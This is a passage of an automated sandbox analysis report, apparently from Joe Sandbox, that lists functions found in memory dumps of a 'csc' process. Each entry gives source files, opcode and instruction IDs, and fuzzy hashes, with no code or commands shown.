                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: p<]q
                                                                                                                                                      • API String ID: 0-1327301063
                                                                                                                                                      • Opcode ID: 2490d84a15166bb1fb46ae723715e5c73c810c5b6f487466f67c7dde332f8cd9
                                                                                                                                                      • Instruction ID: d6628cdcfc6b9e34bda9d3a0790c617d0e0f9ac8adf697cd999068ad42f0741e
                                                                                                                                                      • Opcode Fuzzy Hash: 2490d84a15166bb1fb46ae723715e5c73c810c5b6f487466f67c7dde332f8cd9
                                                                                                                                                      • Instruction Fuzzy Hash: D3213A753001559FCB05CF2AC840EAA7BEAAF89300B1580A6FD64CB375C675DC51CB60
                                                                                                                                                      Function 09366988 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ^j6
                                                                                                                                                      • API String ID: 0-3205939370
                                                                                                                                                      • Opcode ID: e0c5316a348603c9a5e6788c5a08132ac6b8a1ce8ae65f7aa3466f955e37aaf3
                                                                                                                                                      • Instruction ID: 83263b2e353be528c0068d71b5f5b51b39556510f2f2a259e6903e4989d6800c
                                                                                                                                                      • Opcode Fuzzy Hash: e0c5316a348603c9a5e6788c5a08132ac6b8a1ce8ae65f7aa3466f955e37aaf3
                                                                                                                                                      • Instruction Fuzzy Hash: 94210671A002098FCB04DF94C541ADDB7F2FF88304F2085A5E405BB2A5CB76AD45CFA1
                                                                                                                                                      Function 0936EC80 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq
                                                                                                                                                      • API String ID: 0-600464949
                                                                                                                                                      • Opcode ID: a67447389f7f5a33b8370d16eb7f0938c272799bc2f4303868418cef32a8ffc8
                                                                                                                                                      • Instruction ID: 9c61b95ca5377cb9bf15e463eb5b0544ec39c027503ad4d4cfb49fa7ba38d9d3
                                                                                                                                                      • Opcode Fuzzy Hash: a67447389f7f5a33b8370d16eb7f0938c272799bc2f4303868418cef32a8ffc8
                                                                                                                                                      • Instruction Fuzzy Hash: DC11D336604204AFCB069F68D814C59BFB6EF8932031680D5F505DB272CB32DC26DF91
                                                                                                                                                      Function 0A2878E0 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .&4
                                                                                                                                                      • API String ID: 0-2251432316
                                                                                                                                                      • Opcode ID: 02c18214864d56de00d22e93b8ed24f3bbb11dbf34514c956b52f618082e4b47
                                                                                                                                                      • Instruction ID: 9c8d2fdabfa939532893c816e56be925f3450c1b0f66e34690eee798db80d265
                                                                                                                                                      • Opcode Fuzzy Hash: 02c18214864d56de00d22e93b8ed24f3bbb11dbf34514c956b52f618082e4b47
                                                                                                                                                      • Instruction Fuzzy Hash: 2701C0B17362178FCBA9BB39951092633E5AF8922032545B9F40ACB3B1EA20EC00CB50
                                                                                                                                                      Function 0505F828 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045555224.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_5050000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                      • Opcode ID: 68936252aa35d361ed1a4fba54d1020db7b9be4511cfb13d9095295f60a5558b
                                                                                                                                                      • Instruction ID: 66c316badf8375354061d94bb29bb5fef2103251b23ee2e682bb32647ea259bd
                                                                                                                                                      • Opcode Fuzzy Hash: 68936252aa35d361ed1a4fba54d1020db7b9be4511cfb13d9095295f60a5558b
                                                                                                                                                      • Instruction Fuzzy Hash: 9E113AB1D003498FCB10DFAAD4457EFFBF4EB89324F248419D419A7240CB796545CBA5
                                                                                                                                                      Function 06B0005C Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q
                                                                                                                                                      • API String ID: 0-1259897404
                                                                                                                                                      • Opcode ID: affb2234cfb223dcc99bd920a87456ae4e8b486959b1eca4fa2a37554ac947b3
                                                                                                                                                      • Instruction ID: 3dfe80a6051914d14447f41eb36f9eacec628068a7a1d5ac43a8bae8918875a4
                                                                                                                                                      • Opcode Fuzzy Hash: affb2234cfb223dcc99bd920a87456ae4e8b486959b1eca4fa2a37554ac947b3
                                                                                                                                                      • Instruction Fuzzy Hash: 3B01F735B0E3948FF7662A2568246AA7F66EBC206170800EAD48187181DA285C02C7D2
                                                                                                                                                      Function 0936DDA8 Relevance: .4, Instructions: 437COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0159dc4d1e27a6696ba465c7d19836bd6b33f93740f43df4e91472089741e21c
                                                                                                                                                      • Instruction ID: 1eec90a8c0f9e5c1e17acaed99790ea3224c8aa128cd7899d6db07a072921376
                                                                                                                                                      • Opcode Fuzzy Hash: 0159dc4d1e27a6696ba465c7d19836bd6b33f93740f43df4e91472089741e21c
                                                                                                                                                      • Instruction Fuzzy Hash: CD12D834A002198FCB14EF68C894B9DB7B2BF89300F51D5A8E54AAB365DB70ED85CF41
                                                                                                                                                      Function 0937F7B8 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 30c684a7c4103bda6ae100ed905aca1ba8675721836a8b1dfc3ae90ad391105e
                                                                                                                                                      • Instruction ID: 27f7824b440648bef2e27b930662700d396a88234fc1ced050b14c9eac23aecc
                                                                                                                                                      • Opcode Fuzzy Hash: 30c684a7c4103bda6ae100ed905aca1ba8675721836a8b1dfc3ae90ad391105e
                                                                                                                                                      • Instruction Fuzzy Hash: D9A18C35A013099FCB25EFA4D554AADFBB2FF89310F148069E9119B291CB39DD02CF51
                                                                                                                                                      Function 09365809 Relevance: .2, Instructions: 245COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f4318c10e9c5d9fac27b34b270f91d19e1c9fd08cf72e4ea2752b4c0aaba429e
                                                                                                                                                      • Instruction ID: 9c67f20e401d7b767e8756ebfdc0b86e1891dfcfab79e629bcf81bb24e9e43e7
                                                                                                                                                      • Opcode Fuzzy Hash: f4318c10e9c5d9fac27b34b270f91d19e1c9fd08cf72e4ea2752b4c0aaba429e
                                                                                                                                                      • Instruction Fuzzy Hash: A1914575A00218CFCB25EFA8C48499EBBF5FF49350B1584A9E8469B365DB30EC42CF91
                                                                                                                                                      Function 0936DD98 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c33d5ae901cda58003f35a319e4cb06f75027e4533582d2927210afde8060292
                                                                                                                                                      • Instruction ID: 627a0a1e186587e02c365eebfbbf74f78ab7f69ff5bda46239dd1536800b9015
                                                                                                                                                      • Opcode Fuzzy Hash: c33d5ae901cda58003f35a319e4cb06f75027e4533582d2927210afde8060292
                                                                                                                                                      • Instruction Fuzzy Hash: B7A1EB34B002198FCB14EF64C894B99BBB2BF89300F5195A8E54AAB365DF70ED85CF40
                                                                                                                                                      Function 0936ED40 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: da5ae17d36a49486517094cb166f0b55eba3aee09c45fa650d054cc640376c11
                                                                                                                                                      • Instruction ID: 76ca939ccb13e0f441eb36514d7b95792a5f43674c90952293a5d1fa93833fdc
                                                                                                                                                      • Opcode Fuzzy Hash: da5ae17d36a49486517094cb166f0b55eba3aee09c45fa650d054cc640376c11
                                                                                                                                                      • Instruction Fuzzy Hash: 419129347102149FCB14EF68D894A6EBBB6EF89700F1580A9E506DB3A5CB70EC46CF91
                                                                                                                                                      Function 0936F180 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ba5af158528834916615655d81587c3e6efe1e289d577d1e88903279c6ea06c8
                                                                                                                                                      • Instruction ID: c4842e40495b72f9a59a4270cdd233b94ed16d7730a978cf40d96b342743d16f
                                                                                                                                                      • Opcode Fuzzy Hash: ba5af158528834916615655d81587c3e6efe1e289d577d1e88903279c6ea06c8
                                                                                                                                                      • Instruction Fuzzy Hash: 70814934B106088FCB15EF68D454BADBBB2AF89304F50C569E5029B3B8CB75AD46CF90
                                                                                                                                                      Function 06B00CC8 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c423f1d11426a56d385814e99ab28bea0d696cf8fb1ee573dc3a75430265b4c7
                                                                                                                                                      • Instruction ID: 63a0a6e0e7ebec00372863982c37c1995ee0540e3f4803a70721427f2d677c7e
                                                                                                                                                      • Opcode Fuzzy Hash: c423f1d11426a56d385814e99ab28bea0d696cf8fb1ee573dc3a75430265b4c7
                                                                                                                                                      • Instruction Fuzzy Hash: 86517F70B402424BF7142BD994A872BBEAFEBD4701F1444BDA306C7298DFA19C0687E7
                                                                                                                                                      Function 09378530 Relevance: .2, Instructions: 178COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5d19462bd0e1f443ce152921bc31bc5b5dcdc3c87a5a5f8a6e4e12efb4c0f218
                                                                                                                                                      • Instruction ID: e6feafeea25e27ff80e77bebab79a515e5fb837c55f979c9ca57ffc81bddb9ef
                                                                                                                                                      • Opcode Fuzzy Hash: 5d19462bd0e1f443ce152921bc31bc5b5dcdc3c87a5a5f8a6e4e12efb4c0f218
                                                                                                                                                      • Instruction Fuzzy Hash: 27612B70700249CFD724AB66E58D76EB7BAEF44356F018529E40A87A90DB3C9C46CF41
                                                                                                                                                      Function 0A2801D0 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0b9ca9d00573a1b5a72eb9744459056ba7a42c741990a1b4ef337b58dc4f2b40
                                                                                                                                                      • Instruction ID: c8060826b34d43983006b14082faa95291e813c6872d4390ebc55cafa275f02e
                                                                                                                                                      • Opcode Fuzzy Hash: 0b9ca9d00573a1b5a72eb9744459056ba7a42c741990a1b4ef337b58dc4f2b40
                                                                                                                                                      • Instruction Fuzzy Hash: 7251C57032A3028FDB34AF25C540B3677E6AF84345F148938E846876D5DB78E94ACB61
                                                                                                                                                      Function 0936F17A Relevance: .2, Instructions: 171COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fd91c26b9aaa87e29cf4a7ed21c38f84913386219020d868c1f94fcb22546616
                                                                                                                                                      • Instruction ID: 6129c7cf9a5d6bcf71f82c4fecfb1007e1d766c824b522ca7f50129fa94ed323
                                                                                                                                                      • Opcode Fuzzy Hash: fd91c26b9aaa87e29cf4a7ed21c38f84913386219020d868c1f94fcb22546616
                                                                                                                                                      • Instruction Fuzzy Hash: 26617B34A10A098FCB14EF68D454AADB7B2BF89304F50C569E502977B8CB74AD46CF90
                                                                                                                                                      Function 0936ED30 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1a5ef273b33dd15dde26a5157b263872b34d6d6736e6aab43a4a5f9724b656ca
                                                                                                                                                      • Instruction ID: 151956d8c8a2c5bd8f0d44423a3cf86f84845edce1ea0342bdf7a8491f9ca32a
                                                                                                                                                      • Opcode Fuzzy Hash: 1a5ef273b33dd15dde26a5157b263872b34d6d6736e6aab43a4a5f9724b656ca
                                                                                                                                                      • Instruction Fuzzy Hash: B961F734B106149FCB14DF68C494AADB7B6EF88710F1581A9E5069B365CB70EC45CF90
                                                                                                                                                      Function 0A286B81 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6c649fb7dc6e8db194e8471fa926fd1a21c3709591b2a502764696884ce0a5f7
                                                                                                                                                      • Instruction ID: f6e40ea01ecb67a5e84ddf240a7e38415cd81ec3fdd55a86fe3d2b508264e500
                                                                                                                                                      • Opcode Fuzzy Hash: 6c649fb7dc6e8db194e8471fa926fd1a21c3709591b2a502764696884ce0a5f7
                                                                                                                                                      • Instruction Fuzzy Hash: 31515B71A1120ADFCB28EF64D8546AE7BB2FF84314F108179E80697290EB31ED56CF81
                                                                                                                                                      Function 0A287A04 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: eea35c3494104581e642e6b8132307e8a4a6c3e4d3e008f2e60076d690e35de1
                                                                                                                                                      • Instruction ID: eeae357dab35254ee4786e3a4022432140642ab00254d93933366b6acee38d97
                                                                                                                                                      • Opcode Fuzzy Hash: eea35c3494104581e642e6b8132307e8a4a6c3e4d3e008f2e60076d690e35de1
                                                                                                                                                      • Instruction Fuzzy Hash: 9351AFB1D112489FCB28EFA9C444BDDFBF6EF84304F24806AE409AB291C7759946CF90
                                                                                                                                                      Function 09368350 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 08a6c46ab5fcdd689d65a2332f9f2409dc623eafb23c500e68fa0f7ee3378e14
                                                                                                                                                      • Instruction ID: e6badc51044cfa86b25ef9d9c03ee3638fa2c22269ffa2752f673fe4eb25cf8c
                                                                                                                                                      • Opcode Fuzzy Hash: 08a6c46ab5fcdd689d65a2332f9f2409dc623eafb23c500e68fa0f7ee3378e14
                                                                                                                                                      • Instruction Fuzzy Hash: 7F515D34B006099FCB04EFA4E498AAEBBB6FF88715F108119E5069B364DF749D46CF91
                                                                                                                                                      Function 0A280668 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6f5e5de08830f2751bc51c1a403ca4209d4f929b03fc7bc7d653c94d7f15b97f
                                                                                                                                                      • Instruction ID: 00610093ffb65389e2c5d21895a46eb0e072250d6c2a834dbe0998465527e394
                                                                                                                                                      • Opcode Fuzzy Hash: 6f5e5de08830f2751bc51c1a403ca4209d4f929b03fc7bc7d653c94d7f15b97f
                                                                                                                                                      • Instruction Fuzzy Hash: 21510570C14618CADB20EFA8C954ADDBBB0FF48300F10866ED449BB251EB749A88CF91
                                                                                                                                                      Function 09376C90 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4889b0b24ea636315a3476361a0f7049e4848086197246acf913e35a2722bef5
                                                                                                                                                      • Instruction ID: 789f2965e52ef516b77b6c18acc3e2914f45b5441826bfea420c6d2dd40f38ab
                                                                                                                                                      • Opcode Fuzzy Hash: 4889b0b24ea636315a3476361a0f7049e4848086197246acf913e35a2722bef5
                                                                                                                                                      • Instruction Fuzzy Hash: 5941A335724B218FCB356A29C576639F7EAFF88758B094065E806CB750DA39CC418F92
                                                                                                                                                      Function 0A28065C Relevance: .1, Instructions: 128COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ae08edd3960e1ab460cbf8294e77c441e4d4682594644c684a9725c47c5475dc
                                                                                                                                                      • Instruction ID: df0b70b9650568ba235ed393cfeb89f7405d5d10e79e66a568531f7afd7f7e60
                                                                                                                                                      • Opcode Fuzzy Hash: ae08edd3960e1ab460cbf8294e77c441e4d4682594644c684a9725c47c5475dc
                                                                                                                                                      • Instruction Fuzzy Hash: ED510670C25619CADB14EFA8C954AEDBBB0FF49300F10866DD449AB251EB749A88CF91
                                                                                                                                                      Function 093788AD Relevance: .1, Instructions: 125COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b7757202daaaf14296e2d6f5795f4ac2c825aa9d86a964715b6cd206039e6a12
                                                                                                                                                      • Instruction ID: b4d12d04eecec0283d3383d4c8d64bed5e235cb62b0b54eeda226608eb16b104
                                                                                                                                                      • Opcode Fuzzy Hash: b7757202daaaf14296e2d6f5795f4ac2c825aa9d86a964715b6cd206039e6a12
                                                                                                                                                      • Instruction Fuzzy Hash: 10411A38B00618CFDB556B75F65E22D3AA2EF89356B104468E807C7754EF3CAC468F46
                                                                                                                                                      Function 0979FBC0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047906214.0000000009790000.00000040.00000800.00020000.00000000.sdmp, Offset: 09790000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9790000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4291ae3f662e204f3a120d9fe6c4a5ab5598a7df37e53c0f37df60ba738967a4
                                                                                                                                                      • Instruction ID: b4664115ae38d94f48f960dbd2a953e10239179fac451065a40d756bc4b1c5f4
                                                                                                                                                      • Opcode Fuzzy Hash: 4291ae3f662e204f3a120d9fe6c4a5ab5598a7df37e53c0f37df60ba738967a4
                                                                                                                                                      • Instruction Fuzzy Hash: A3414A71B10609DFCB24EBA9E854B5AB7B2FB89314F10C429E906DB390DB35EC42CB50
                                                                                                                                                      Function 0936F030 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e4c17d54b368d146f656ba5d47ac2f89cebc4dfba7d5fa0e1493b1eed0dcfcb1
                                                                                                                                                      • Instruction ID: e061083dd96ae8b6dc34ba20de6c6a40653fb25637aab44d445ede5ce7e3dab6
                                                                                                                                                      • Opcode Fuzzy Hash: e4c17d54b368d146f656ba5d47ac2f89cebc4dfba7d5fa0e1493b1eed0dcfcb1
                                                                                                                                                      • Instruction Fuzzy Hash: BA314A35A00118ABCB14DFA4E855AEEB7B6FF88354F20C025E805B73A4CB759D06CFA0
                                                                                                                                                      Function 09379898 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 29635d0e926c55f050e3516b2f4b55200342f7c7aef3d6a2ec1f361c13eb9983
                                                                                                                                                      • Instruction ID: 5cc2b00fbfb9ffa380271b3957688dbab2d666b17df5915252470d6ee2ebb321
                                                                                                                                                      • Opcode Fuzzy Hash: 29635d0e926c55f050e3516b2f4b55200342f7c7aef3d6a2ec1f361c13eb9983
                                                                                                                                                      • Instruction Fuzzy Hash: AB315A31A01318EFD7319B2CD801BA6BBAAFB46711F054279E446CB312C7389C46CFA2
                                                                                                                                                      Function 09376C81 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
